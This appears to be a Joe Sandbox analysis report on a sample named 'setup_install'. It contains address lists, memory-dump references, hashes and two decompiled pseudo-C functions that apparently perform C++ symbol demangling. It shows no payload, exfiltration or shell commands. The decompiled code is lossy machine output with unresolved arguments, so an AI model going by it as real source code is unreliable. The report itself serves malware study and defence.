0x0040c719
0x0040c720
0x00000000
0x0040c720
0x0040c70f
0x0040c706
0x00000000
0x0040c783
0x0040c783
0x0040c786
0x0040c786
0x0040c792
0x00000000
0x0040c792
0x0040c6ce
0x0040c6bf
0x0040c6b3
0x0040c6a8
0x0040c73b
0x0040c5ef
0x0040c5ef
0x0040c5ef
0x0040c5f4
0x0040c5f4
0x0040c5fa
0x00000000
0x0040c5fc
0x0040c5fc
0x0040c5fc
0x0040c604
0x0040c607
0x0040c60b
0x0040c610
0x0040c614
0x0040c623
0x0040c623
0x0040c634
0x0040c636
0x0040c63b
0x0040c63e
0x0040c644
0x0040c646
0x00000000
0x00000000
0x0040c620
0x0040c620
0x0040c620
0x0040c648
0x0040c64b
0x0040c64b
0x0040c651
0x0040c653
0x00000000
0x0040c659
0x0040c65f
0x0040c662
0x0040c662
0x0040c66b
0x0040c66e
0x0040c670
0x0040c672
0x0040c689
0x0040c68b
0x0040c68b
0x0040c68e
0x0040c691
0x0040c691
0x0040c6a0
0x0040c6a0
0x0040c653
0x0040c5fa
0x0040c5e9
0x0040c5e1
0x0040c583
0x0040c583
0x0040c58a
0x0040c58a
0x00000000

APIs

VirtualProtect.KERNEL32 ref: 0040C689

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c909a30093396acd372c653b44ce4401ee0243de9a71024414194a85c275da86
Instruction ID: 144837b35d5e238b93ca537be324b230260978d4af6e546d27d0e96d70e6f5f1
Opcode Fuzzy Hash: c909a30093396acd372c653b44ce4401ee0243de9a71024414194a85c275da86
Instruction Fuzzy Hash: 06A18070A04205CBCB149F68C8C075AB7A1FB45328F15873FD898AB3D2D77D98459B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040627B, Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 315
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040627B(signed char* __ebx) {
				signed char* _t171;
				signed char* _t175;
				signed int _t176;
				signed int _t183;
				signed int _t185;
				signed int _t190;
				signed int _t199;
				signed char _t200;
				signed int _t203;
				signed int _t205;
				signed int _t207;
				signed int _t208;
				intOrPtr* _t222;
				signed char* _t224;
				signed int _t226;
				signed int _t230;
				signed int _t232;
				void* _t239;
				signed int _t244;
				signed char _t245;
				void* _t247;
				signed int _t256;
				intOrPtr _t258;
				signed char* _t263;
				signed int _t266;
				signed int _t268;
				signed char* _t272;
				intOrPtr _t274;
				intOrPtr _t277;
				intOrPtr _t281;
				signed int _t283;
				signed char* _t284;
				signed int _t286;
				signed char* _t287;
				signed char _t290;
				signed char* _t292;
				signed char** _t293;

				_t224 = __ebx;
				_t171 =  *(_t290 + 8);
				_t255 =  *(_t290 + 0xc);
				_t293[8] = _t171;
				_t172 =  *_t171;
				_t293[7] =  *(_t290 + 0xc);
				if( *_t171 == 0x31) {
					_t175 =  *(_t293[8][8]);
					_t293[1] = "ad";
					 *_t293 = _t175;
					_t293[9] = _t175;
					_t176 = strcmp(??, ??);
					_t256 = _t293[7];
					_t239 =  *_t256;
					__eflags = _t176;
					if(_t176 != 0) {
						L11:
						__eflags = _t239 - 0x38;
						if(_t239 == 0x38) {
							E0040B460(_t224, _t293[7][8], _t293[6]);
							E0040B3C0(_t224, _t293[8], _t293[6]);
							_t258 =  *((intOrPtr*)(_t290 + 4));
							_t172 = _t293[0xd];
							_t167 = _t258 - 1; // 0x4a32c4
							_t281 = _t167;
							_t255 = _t224[0x11c] - 1;
							goto L1;
						}
						L12:
						_t293[1] = "sZ";
						 *_t293 = _t293[9];
						_t183 = strcmp(??, ??);
						_t283 = _t183;
						__eflags = _t183;
						if(__eflags == 0) {
							_t185 = E00402DE0(_t224, _t293[7]);
							__eflags = _t185;
							if(_t185 != 0) {
								while(1) {
									__eflags =  *_t185 - 0x2f;
									if( *_t185 != 0x2f) {
										break;
									}
									__eflags =  *(_t185 + 8);
									if( *(_t185 + 8) == 0) {
										break;
									}
									_t185 =  *(_t185 + 0xc);
									_t283 = _t283 + 1;
									__eflags = _t185;
									if(_t185 == 0) {
										break;
									}
								}
								L47:
								_t293[2] = _t283;
								_t284 =  &(_t293[0x10]);
								_t293[1] = "%d";
								 *_t293 = _t284;
								sprintf(??, ??);
								asm("repne scasb");
								_t190 =  !(_t226 | 0xffffffff) - 1;
								__eflags = _t190;
								_t263 =  &(_t284[_t190]);
								if(_t190 == 0) {
									L53:
									_t157 = _t290 + 4; // 0x4a3127
									_t172 = _t293[0xd];
									_t281 =  *_t157 - 1;
									_t255 = _t224[0x11c] - 1;
									goto L1;
								}
								_t293[6] = _t290;
								_t292 = _t263;
								do {
									__eflags = _t224[0x100] - 0xff;
									_t266 =  *_t284 & 0x000000ff;
									if(_t224[0x100] == 0xff) {
										_t224[0xff] = 0;
										_t293[1] = 0xff;
										_t293[2] = _t224[0x10c];
										 *_t293 = _t224;
										_t224[0x108]();
										_t148 =  &(_t224[0x128]);
										 *_t148 = _t224[0x128] + 1;
										__eflags =  *_t148;
										_t224[0x100] = 0;
									}
									_t191 = _t224[0x100];
									_t284 =  &(_t284[1]);
									_t152 = _t191 + 1; // 0x1
									_t224[0x100] = _t152;
									_t244 = _t266;
									_t224[_t224[0x100]] = _t244;
									_t224[0x104] = _t244;
									__eflags = _t292 - _t284;
								} while (_t292 != _t284);
								_t290 = _t293[6];
								goto L53;
							}
							goto L47;
						}
						_t230 = 3;
						asm("repe cmpsb");
						asm("sbb al, 0x0");
						if(__eflags == 0) {
							_t286 = 0;
							_t268 = _t293[7];
							while(1) {
								__eflags =  *_t268 - 0x2f;
								if( *_t268 != 0x2f) {
									break;
								}
								_t203 =  *(_t268 + 8);
								__eflags = _t203;
								if(_t203 == 0) {
									break;
								}
								__eflags =  *_t203 - 0x4a;
								if( *_t203 != 0x4a) {
									_t286 = _t286 + 1;
									__eflags = _t286;
									L24:
									_t268 =  *(_t268 + 0xc);
									__eflags = _t268;
									if(_t268 == 0) {
										break;
									}
									continue;
								}
								_t205 = E00402DE0(_t224,  *((intOrPtr*)(_t203 + 8)));
								_t247 = 0;
								__eflags = _t205;
								if(_t205 != 0) {
									while(1) {
										__eflags =  *_t205 - 0x2f;
										if( *_t205 != 0x2f) {
											break;
										}
										_t230 =  *(_t205 + 8);
										__eflags = _t230;
										if(_t230 == 0) {
											break;
										}
										_t205 =  *(_t205 + 0xc);
										_t247 = _t247 + 1;
										__eflags = _t205;
										if(_t205 == 0) {
											break;
										}
									}
									L33:
									_t286 = _t286 + _t247;
									goto L24;
								}
								goto L33;
							}
							_t293[2] = _t286;
							_t287 =  &(_t293[0x10]);
							_t293[1] = "%d";
							 *_t293 = _t287;
							sprintf(??, ??);
							asm("repne scasb");
							_t199 =  !(_t230 | 0xffffffff) - 1;
							__eflags = _t199;
							if(_t199 == 0) {
								L39:
								_t127 = _t290 + 4; // 0x4a3127
								_t172 = _t293[0xd];
								_t281 =  *_t127 - 1;
								_t255 = _t224[0x11c] - 1;
								goto L1;
							}
							_t245 = _t224[0x100];
							_t272 =  &(_t287[_t199]);
							do {
								_t232 =  *_t287 & 0x000000ff;
								_t200 = _t245;
								__eflags = _t245 - 0xff;
								if(_t245 == 0xff) {
									_t224[0xff] = 0;
									_t293[6] = _t232;
									_t293[2] = _t224[0x10c];
									_t293[1] = 0xff;
									 *_t293 = _t224;
									_t224[0x108]();
									_t224[0x128] = _t224[0x128] + 1;
									_t232 = _t293[6] & 0x000000ff;
									_t200 = 0;
									__eflags = 0;
								}
								_t245 = _t200 + 1;
								_t287 =  &(_t287[1]);
								_t224[0x100] = _t245;
								_t224[_t200] = _t232;
								_t224[0x104] = _t232;
								__eflags = _t272 - _t287;
							} while (_t272 != _t287);
							goto L39;
						}
						_t207 = E0040B3C0(_t224, _t293[8], _t293[6]);
						asm("repe cmpsb");
						_t208 = _t207 & 0xffffff00 | __eflags > 0x00000000;
						asm("sbb al, 0x0");
						__eflags = _t208;
						if(__eflags == 0) {
							E00405780(_t224, _t293[7], _t293[6]);
							_t274 =  *((intOrPtr*)(_t290 + 4));
							_t172 = _t293[0xd];
							_t101 = _t274 - 1; // 0x4a32c7
							_t281 = _t101;
							_t255 = _t224[0x11c] - 1;
							goto L1;
						}
						asm("repe cmpsb");
						asm("sbb al, 0x0");
						if(__eflags != 0) {
							goto L8;
						}
						__eflags = _t224[0x100] - 0xff;
						if(_t224[0x100] == 0xff) {
							_t224[0xff] = 0;
							_t293[1] = 0xff;
							_t293[2] = _t224[0x10c];
							 *_t293 = _t224;
							_t224[0x108]();
							_t69 =  &(_t224[0x128]);
							 *_t69 = _t224[0x128] + 1;
							__eflags =  *_t69;
							_t224[0x100] = 0;
						}
						_t74 = _t224[0x100] + 1; // 0x100
						_t224[0x100] = _t74;
						_t224[_t224[0x100]] = 0x28;
						_t224[0x104] = 0x28;
						E00405780(_t224, _t293[7], _t293[6]);
						__eflags = _t224[0x100] - 0xff;
						if(_t224[0x100] == 0xff) {
							_t224[0xff] = 0;
							_t293[1] = 0xff;
							_t293[2] = _t224[0x10c];
							 *_t293 = _t224;
							_t224[0x108]();
							_t85 =  &(_t224[0x128]);
							 *_t85 = _t224[0x128] + 1;
							__eflags =  *_t85;
							_t224[0x100] = 0;
						}
						_t89 = _t224[0x100] + 1; // 0x100
						_t224[0x100] = _t89;
						_t224[_t224[0x100]] = 0x29;
						_t172 = _t293[0xd];
						_t224[0x104] = 0x29;
						_t95 =  *((intOrPtr*)(_t290 + 4)) - 1; // 0x4a32c7
						_t281 = _t95;
						_t255 = _t224[0x11c] - 1;
						goto L1;
					}
					__eflags = _t239 - 3;
					if(_t239 == 3) {
						_t222 =  *((intOrPtr*)(_t256 + 8));
						__eflags =  *_t222 - 1;
						if( *_t222 == 1) {
							__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t256 + 0xc)))) - 0x29;
							_t223 =  !=  ? _t256 : _t222;
							_t293[7] =  !=  ? _t256 : _t222;
						}
						goto L12;
					}
					goto L11;
				} else {
					__eflags = __eax - 0x33;
					if(__eax != 0x33) {
						__ecx = __esp[0x20];
						__edx = __esp[0x18];
						__eax = __ebx;
						__eax = E0040B3C0(__ebx, __ecx, __edx);
					} else {
						__eflags =  *(__ebx + 0x100) - 0xff;
						if( *(__ebx + 0x100) == 0xff) {
							__eax =  *(__ebx + 0x10c);
							0xff[__ebx] = 0;
							__esp[4] = 0xff;
							__esp[8] =  *(__ebx + 0x10c);
							 *__esp = __ebx;
							__eax =  *((intOrPtr*)(__ebx + 0x108))();
							_t14 = __ebx + 0x128;
							 *_t14 =  *(__ebx + 0x128) + 1;
							__eflags =  *_t14;
							 *(__ebx + 0x100) = 0;
						}
						_t18 =  *(__ebx + 0x100) + 1; // 0x100
						__edx = _t18;
						 *(__ebx + 0x100) = _t18;
						__edx = __esp[0x18];
						 *((char*)(__ebx +  *(__ebx + 0x100))) = 0x28;
						__eax = __esp[0x20];
						 *((char*)(__ebx + 0x104)) = 0x28;
						__ecx =  *(__esp[0x20] + 8);
						__ebx = E00405780(__ebx, __ecx, __esp[0x18]);
						__eflags =  *(__ebx + 0x100) - 0xff;
						if( *(__ebx + 0x100) == 0xff) {
							__eax =  *(__ebx + 0x10c);
							0xff[__ebx] = 0;
							__esp[4] = 0xff;
							__esp[8] =  *(__ebx + 0x10c);
							 *__esp = __ebx;
							__eax =  *((intOrPtr*)(__ebx + 0x108))();
							_t31 = __ebx + 0x128;
							 *_t31 =  *(__ebx + 0x128) + 1;
							__eflags =  *_t31;
							 *(__ebx + 0x100) = 0;
						}
						__eax =  *(__ebx + 0x100);
						_t35 = __eax + 1; // 0x100
						__edx = _t35;
						 *(__ebx + 0x100) = __edx;
						 *((char*)(__ebx + __eax)) = 0x29;
						 *((char*)(__ebx + 0x104)) = 0x29;
					}
					L8:
					E0040B460(_t224, _t293[7], _t293[6]);
					_t277 =  *((intOrPtr*)(_t290 + 4));
					_t172 = _t293[0xd];
					_t43 = _t277 - 1; // 0x4a32c7
					_t281 = _t43;
					_t255 = _t224[0x11c] - 1;
				}
				L1:
				_t224[0x12c] = _t172;
				 *((intOrPtr*)(_t290 + 4)) = _t281;
				_t224[0x11c] = _t255;
				return _t172;
			}

0x0040627b
0x0040627b
0x0040627e
0x00406281
0x00406285
0x00406287
0x0040628e
0x00408bbe
0x00408bc0
0x00408bc8
0x00408bcb
0x00408bcf
0x00408bd4
0x00408bd8
0x00408bda
0x00408bdc
0x00408be7
0x00408be7
0x00408bea
0x00409da7
0x00409db4
0x00409db9
0x00409dbc
0x00409dc0
0x00409dc0
0x00409dc9
0x00000000
0x00409dc9
0x00408bf0
0x00408bf4
0x00408bfc
0x00408bff
0x00408c04
0x00408c06
0x00408c08
0x00409cbe
0x00409cc3
0x00409cc5
0x00409ce1
0x00409ce1
0x00409ce4
0x00000000
0x00000000
0x00409cd3
0x00409cd5
0x00000000
0x00000000
0x00409cd7
0x00409cda
0x00409cdd
0x00409cdf
0x00000000
0x00000000
0x00409cdf
0x00409ce6
0x00409ce6
0x00409cea
0x00409cee
0x00409cf8
0x00409cfb
0x00409d05
0x00409d0b
0x00409d0b
0x00409d0e
0x00409d11
0x00409d80
0x00409d80
0x00409d83
0x00409d87
0x00409d90
0x00000000
0x00409d90
0x00409d13
0x00409d17
0x00409d19
0x00409d19
0x00409d23
0x00409d26
0x00409d2e
0x00409d35
0x00409d3d
0x00409d41
0x00409d44
0x00409d4a
0x00409d4a
0x00409d4a
0x00409d51
0x00409d51
0x00409d5b
0x00409d61
0x00409d64
0x00409d67
0x00409d6d
0x00409d6f
0x00409d72
0x00409d78
0x00409d78
0x00409d7c
0x00000000
0x00409d7c
0x00000000
0x00409cc7
0x00408c17
0x00408c1c
0x00408c21
0x00408c25
0x0040973a
0x0040973c
0x0040974c
0x0040974c
0x0040974f
0x00000000
0x00000000
0x00409751
0x00409754
0x00409756
0x00000000
0x00000000
0x00409758
0x0040975b
0x00409742
0x00409742
0x00409745
0x00409745
0x00409748
0x0040974a
0x00000000
0x00000000
0x00000000
0x0040974a
0x00409762
0x00409767
0x00409769
0x0040976b
0x00409781
0x00409781
0x00409784
0x00000000
0x00000000
0x00409770
0x00409773
0x00409775
0x00000000
0x00000000
0x00409777
0x0040977a
0x0040977d
0x0040977f
0x00000000
0x00000000
0x0040977f
0x00409786
0x00409786
0x00000000
0x00409786
0x00000000
0x0040976d
0x0040978a
0x0040978e
0x00409792
0x0040979c
0x0040979f
0x004097a9
0x004097af
0x004097af
0x004097b2
0x00409817
0x00409817
0x0040981a
0x0040981e
0x00409827
0x00000000
0x00409827
0x004097b4
0x004097ba
0x004097bd
0x004097bd
0x004097c0
0x004097c2
0x004097c8
0x004097d0
0x004097d7
0x004097db
0x004097df
0x004097e7
0x004097ea
0x004097f0
0x004097f7
0x004097fc
0x004097fc
0x004097fc
0x004097fe
0x00409801
0x00409804
0x0040980a
0x0040980d
0x00409813
0x00409813
0x00000000
0x004097bd
0x00408c3a
0x00408c48
0x00408c4a
0x00408c4d
0x00408c4f
0x00408c51
0x0040944b
0x00409450
0x00409453
0x00409457
0x00409457
0x00409460
0x00000000
0x00409460
0x00408c65
0x00408c6a
0x00408c6e
0x00000000
0x00000000
0x00408c74
0x00408c7e
0x00408c86
0x00408c8d
0x00408c95
0x00408c99
0x00408c9c
0x00408ca2
0x00408ca2
0x00408ca2
0x00408ca9
0x00408ca9
0x00408cbd
0x00408cc0
0x00408cca
0x00408cd0
0x00408cd7
0x00408cdc
0x00408ce6
0x00408cee
0x00408cf5
0x00408cfd
0x00408d01
0x00408d04
0x00408d0a
0x00408d0a
0x00408d0a
0x00408d11
0x00408d11
0x00408d21
0x00408d24
0x00408d2a
0x00408d2e
0x00408d32
0x00408d3c
0x00408d3c
0x00408d45
0x00000000
0x00408d45
0x00408bde
0x00408be1
0x00409c9a
0x00409c9d
0x00409ca0
0x00409ca9
0x00409cac
0x00409caf
0x00409caf
0x00000000
0x00409ca0
0x00000000
0x00406294
0x00406294
0x00406297
0x00409fdb
0x00409fdf
0x00409fe3
0x00409fe5
0x0040629d
0x0040629d
0x004062a7
0x004062a9
0x004062af
0x004062b6
0x004062be
0x004062c2
0x004062c5
0x004062cb
0x004062cb
0x004062cb
0x004062d2
0x004062d2
0x004062e2
0x004062e2
0x004062e5
0x004062eb
0x004062ef
0x004062f3
0x004062f7
0x004062fe
0x00406303
0x00406308
0x00406312
0x00406314
0x0040631a
0x00406321
0x00406329
0x0040632d
0x00406330
0x00406336
0x00406336
0x00406336
0x0040633d
0x0040633d
0x00406347
0x0040634d
0x0040634d
0x00406350
0x00406356
0x0040635a
0x0040635a
0x00406361
0x0040636b
0x00406370
0x00406373
0x00406377
0x00406377
0x00406380
0x00406380
0x00405981
0x00405981
0x00405987
0x0040598a
0x0040599a

APIs

strcmp.MSVCRT ref: 00408BCF
strcmp.MSVCRT ref: 00408BFF

Strings

0-J, xrefs: 00408C5B
'1J, xrefs: 00409817
3-J, xrefs: 00408C12
), xrefs: 00408D32

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: strcmp
String ID: '1J$)$0-J$3-J
API String ID: 1004003707-3515263298
Opcode ID: 0ec6a0d0ceb6ac4c5ed108ca5ae47d2d169004e39f0c3282c4866c887f92074a
Instruction ID: 685c91f4ba9eb4991a003c18805ad53ad31303242a516b5dace2d1d803f11fe8
Opcode Fuzzy Hash: 0ec6a0d0ceb6ac4c5ed108ca5ae47d2d169004e39f0c3282c4866c887f92074a
Instruction Fuzzy Hash: 57E13875608202CFCB11CF28C4847AAB7E1AF95314F19897AEC885F386C779EC45DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD60, Relevance: 10.8, APIs: 2, Strings: 5, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040AD60(signed int __eax, signed int __ecx, signed char* __edx) {
				void* _t103;
				void* _t106;
				signed int _t109;
				void* _t111;
				signed int _t112;
				int _t116;
				signed int _t117;
				void* _t121;
				signed int _t125;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				signed char* _t137;
				char* _t138;
				signed int* _t141;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t157;
				signed int _t158;
				signed int _t162;
				signed char _t166;
				signed char* _t167;
				signed char* _t168;
				signed int _t169;
				signed char* _t171;
				signed int _t172;
				signed char** _t173;

				_t100 = __eax;
				_t173[5] = __edx;
				_t169 = _t173[0x18];
				if(__ecx == 0) {
					L25:
					return _t100;
				} else {
					_t134 = __ecx;
					_t168 = __eax;
					if( *((intOrPtr*)(__eax + 0x118)) == 0) {
						goto L10;
					} else {
						return __eax;
					}
					do {
						goto L10;
						L9:
						__eflags = _t168[0x118];
					} while (_t168[0x118] == 0);
					goto L25;
					L10:
					_t100 =  *(_t134 + 8);
					__eflags = _t100;
					if(_t100 != 0) {
						L8:
						_t134 =  *_t134;
						__eflags = _t134;
						if(_t134 == 0) {
							goto L25;
						} else {
							goto L9;
						}
					} else {
						_t141 =  *(_t134 + 4);
						_t100 =  *_t141;
						__eflags = _t169;
						if(_t169 != 0) {
							L4:
							_t166 = _t168[0x110];
							 *(_t134 + 8) = 1;
							_t168[0x110] =  *(_t134 + 0xc);
							__eflags = _t100 - 0x29;
							if(_t100 == 0x29) {
								__eflags =  &(_t141[3]);
								 *_t173 =  *_t134;
								_t103 = E0040AA30(_t168,  &(_t141[3]), _t173[5]);
								_t168[0x110] = _t166;
								return _t103;
							} else {
								__eflags = _t100 - 0x2a;
								if(_t100 == 0x2a) {
									__eflags =  &(_t141[2]);
									 *_t173 =  *_t134;
									_t106 = E0040B120(_t168,  &(_t141[2]), _t173[5]);
									_t168[0x110] = _t166;
									return _t106;
								} else {
									__eflags = _t100 - 2;
									if(_t100 == 2) {
										_t168[0x114] = 0;
										E00405780(_t168, _t141[2], _t173[5]);
										_t109 = _t168[0x100];
										__eflags = _t173[5] & 0x00000004;
										if((_t173[5] & 0x00000004) == 0) {
											_t173[6] = _t134;
											_t171 = 0x4a3116;
											_t135 = 0x3a;
											while(1) {
												__eflags = _t109 - 0xff;
												if(_t109 != 0xff) {
													_t145 = _t109;
													_t109 = _t109 + 1;
													__eflags = _t109;
												} else {
													_t168[0xff] = 0;
													_t173[1] = 0xff;
													_t173[2] = _t168[0x10c];
													 *_t173 = _t168;
													_t168[0x108]();
													_t168[0x128] = _t168[0x128] + 1;
													_t109 = 1;
													_t145 = 0;
												}
												_t171 =  &(_t171[1]);
												_t168[0x100] = _t109;
												_t168[_t145] = _t135;
												_t168[0x104] = _t135;
												__eflags = _t171 - 0x4a3118;
												if(_t171 == 0x4a3118) {
													break;
												}
												_t135 =  *_t171 & 0x000000ff;
											}
											_t134 = _t173[6];
											L20:
											_t172 = ( *(_t134 + 4))[3];
											_t111 =  *_t172;
											__eflags = _t111 - 0x46;
											if(_t111 == 0x46) {
												_t112 = _t168[0x100];
												_t136 =  &M004A311A;
												_t157 = 0x7b;
												while(1) {
													__eflags = _t112 - 0xff;
													if(_t112 != 0xff) {
														_t146 = _t112;
														_t112 = _t112 + 1;
														__eflags = _t112;
													} else {
														_t168[0xff] = 0;
														_t173[6] = _t157;
														_t173[2] = _t168[0x10c];
														_t173[1] = 0xff;
														 *_t173 = _t168;
														_t168[0x108]();
														_t168[0x128] = _t168[0x128] + 1;
														_t112 = 1;
														_t146 = 0;
														_t157 = _t173[6] & 0x000000ff;
													}
													_t168[0x100] = _t112;
													_t168[_t146] = _t157;
													_t168[0x104] = _t157;
													__eflags = _t136 - 0x4a3126;
													if(_t136 == 0x4a3126) {
														break;
													}
													_t157 =  *_t136 & 0x000000ff;
													_t136 = _t136 + 1;
													__eflags = _t136;
												}
												_t137 =  &(_t173[9]);
												_t173[1] = "%d";
												 *_t173 = _t137;
												_t173[2] =  *((intOrPtr*)(_t172 + 0xc)) + 1;
												sprintf(??, ??);
												 *_t173 = _t137;
												_t116 = strlen(??);
												_t158 = _t168[0x100];
												__eflags = _t116;
												if(_t116 == 0) {
													L50:
													_t138 = "}::";
													_t117 = 0x7d;
													while(1) {
														__eflags = _t158 - 0xff;
														if(_t158 != 0xff) {
															_t147 = _t158;
															_t158 = _t158 + 1;
															__eflags = _t158;
														} else {
															_t168[0xff] = 0;
															_t173[6] = _t117;
															_t173[2] = _t168[0x10c];
															_t173[1] = 0xff;
															 *_t173 = _t168;
															_t168[0x108]();
															_t168[0x128] = _t168[0x128] + 1;
															_t158 = 1;
															_t147 = 0;
															_t117 = _t173[6] & 0x000000ff;
														}
														_t168[0x100] = _t158;
														_t138 =  &(_t138[1]);
														_t168[_t147] = _t117;
														_t168[0x104] = _t117;
														__eflags = 0x4a312d - _t138;
														if(0x4a312d == _t138) {
															break;
														}
														_t117 =  *_t138 & 0x000000ff;
													}
													L29:
													_t172 =  *(_t172 + 8);
													_t111 =  *_t172;
													goto L21;
												}
												_t173[7] = _t166;
												_t167 =  &(_t137[_t116]);
												do {
													_t125 =  *_t137 & 0x000000ff;
													__eflags = _t158 - 0xff;
													if(_t158 != 0xff) {
														_t149 = _t158;
														_t158 = _t158 + 1;
														__eflags = _t158;
													} else {
														_t168[0xff] = 0;
														_t173[6] = _t125;
														_t173[2] = _t168[0x10c];
														_t173[1] = 0xff;
														 *_t173 = _t168;
														_t168[0x108]();
														_t168[0x128] = _t168[0x128] + 1;
														_t158 = 1;
														_t149 = 0;
														_t125 = _t173[6] & 0x000000ff;
													}
													_t137 =  &(_t137[1]);
													_t168[0x100] = _t158;
													_t168[_t149] = _t125;
													_t168[0x104] = _t125;
													__eflags = _t167 - _t137;
												} while (_t167 != _t137);
												_t166 = _t173[7];
												goto L50;
											}
											L21:
											__eflags = _t111 - 0x4c;
											if(__eflags == 0) {
												goto L29;
											}
											if(__eflags > 0) {
												__eflags = _t111 - 0x4e - 1;
												if(_t111 - 0x4e > 1) {
													L24:
													_t121 = E00405780(_t168, _t172, _t173[5]);
													_t168[0x110] = _t166;
													return _t121;
												}
												goto L29;
											}
											__eflags = _t111 - 0x1c - 4;
											if(_t111 - 0x1c <= 4) {
												goto L29;
											}
											goto L24;
										}
										_t162 = _t109 + 1;
										__eflags = _t109 - 0xff;
										if(_t109 == 0xff) {
											_t168[0xff] = 0;
											_t173[1] = 0xff;
											_t173[2] = _t168[0x10c];
											 *_t173 = _t168;
											_t168[0x108]();
											_t168[0x128] = _t168[0x128] + 1;
											_t162 = 1;
											_t109 = 0;
											__eflags = 0;
										}
										_t168[0x100] = _t162;
										_t168[_t109] = 0x2e;
										_t168[0x104] = 0x2e;
										goto L20;
									}
									_t100 = E0040A110(_t168, _t141, _t173[5]);
									_t168[0x110] = _t166;
									goto L8;
								}
							}
						} else {
							__eflags = _t100 - 0x4c;
							if(__eflags == 0) {
								goto L8;
							} else {
								if(__eflags <= 0) {
									__eflags = _t100 - 0x1c - 4;
									if(_t100 - 0x1c <= 4) {
										goto L8;
									} else {
										goto L4;
									}
								} else {
									__eflags = _t100 - 0x4e - 1;
									if(_t100 - 0x4e > 1) {
										goto L4;
									} else {
										goto L8;
									}
								}
							}
						}
					}
				}
			}

0x0040ad60
0x0040ad67
0x0040ad6b
0x0040ad71
0x0040aeca
0x0040aeca
0x0040ad77
0x0040ad77
0x0040ad7f
0x0040ad83
0x00000000
0x00000000
0x00000000
0x00000000
0x0040adee
0x00000000
0x0040ade0
0x0040ade6
0x0040ade6
0x00000000
0x0040adee
0x0040adee
0x0040adf1
0x0040adf3
0x0040add6
0x0040add6
0x0040add8
0x0040adda
0x00000000
0x00000000
0x00000000
0x00000000
0x0040adf5
0x0040adf5
0x0040adf8
0x0040adfa
0x0040adfc
0x0040ad98
0x0040ad9b
0x0040ada1
0x0040ada8
0x0040adae
0x0040adb1
0x0040aed1
0x0040aed4
0x0040aed9
0x0040aede
0x0040aeeb
0x0040adb7
0x0040adb7
0x0040adba
0x0040aef2
0x0040aef5
0x0040aefa
0x0040aeff
0x0040af0c
0x0040adc0
0x0040adc0
0x0040adc3
0x0040ae1a
0x0040ae28
0x0040ae33
0x0040ae39
0x0040ae3e
0x0040af22
0x0040af26
0x0040af2b
0x0040af53
0x0040af53
0x0040af58
0x0040af30
0x0040af32
0x0040af32
0x0040af5a
0x0040af60
0x0040af67
0x0040af6f
0x0040af73
0x0040af76
0x0040af7c
0x0040af83
0x0040af88
0x0040af88
0x0040af35
0x0040af38
0x0040af3e
0x0040af41
0x0040af47
0x0040af4d
0x00000000
0x00000000
0x0040af4f
0x0040af4f
0x0040af8c
0x0040ae8f
0x0040ae92
0x0040ae95
0x0040ae98
0x0040ae9b
0x0040af95
0x0040af9b
0x0040afa0
0x0040afc9
0x0040afc9
0x0040afce
0x0040afa7
0x0040afa9
0x0040afa9
0x0040afd0
0x0040afd6
0x0040afdd
0x0040afe1
0x0040afe5
0x0040afed
0x0040aff0
0x0040aff6
0x0040affd
0x0040b002
0x0040b004
0x0040b004
0x0040afac
0x0040afb2
0x0040afb5
0x0040afbb
0x0040afc1
0x00000000
0x00000000
0x0040afc3
0x0040afc6
0x0040afc6
0x0040afc6
0x0040b00e
0x0040b012
0x0040b01a
0x0040b020
0x0040b024
0x0040b029
0x0040b02c
0x0040b031
0x0040b037
0x0040b039
0x0040b0aa
0x0040b0aa
0x0040b0af
0x0040b0dd
0x0040b0dd
0x0040b0e3
0x0040b0b6
0x0040b0b8
0x0040b0b8
0x0040b0e5
0x0040b0eb
0x0040b0f2
0x0040b0f6
0x0040b0fa
0x0040b102
0x0040b105
0x0040b10b
0x0040b112
0x0040b117
0x0040b119
0x0040b119
0x0040b0bb
0x0040b0c1
0x0040b0c4
0x0040b0c7
0x0040b0d2
0x0040b0d4
0x00000000
0x00000000
0x0040b0da
0x0040b0da
0x0040af15
0x0040af15
0x0040af18
0x00000000
0x0040af18
0x0040b03d
0x0040b041
0x0040b060
0x0040b060
0x0040b063
0x0040b069
0x0040b045
0x0040b047
0x0040b047
0x0040b06b
0x0040b071
0x0040b078
0x0040b07c
0x0040b080
0x0040b088
0x0040b08b
0x0040b091
0x0040b098
0x0040b09d
0x0040b09f
0x0040b09f
0x0040b04a
0x0040b04d
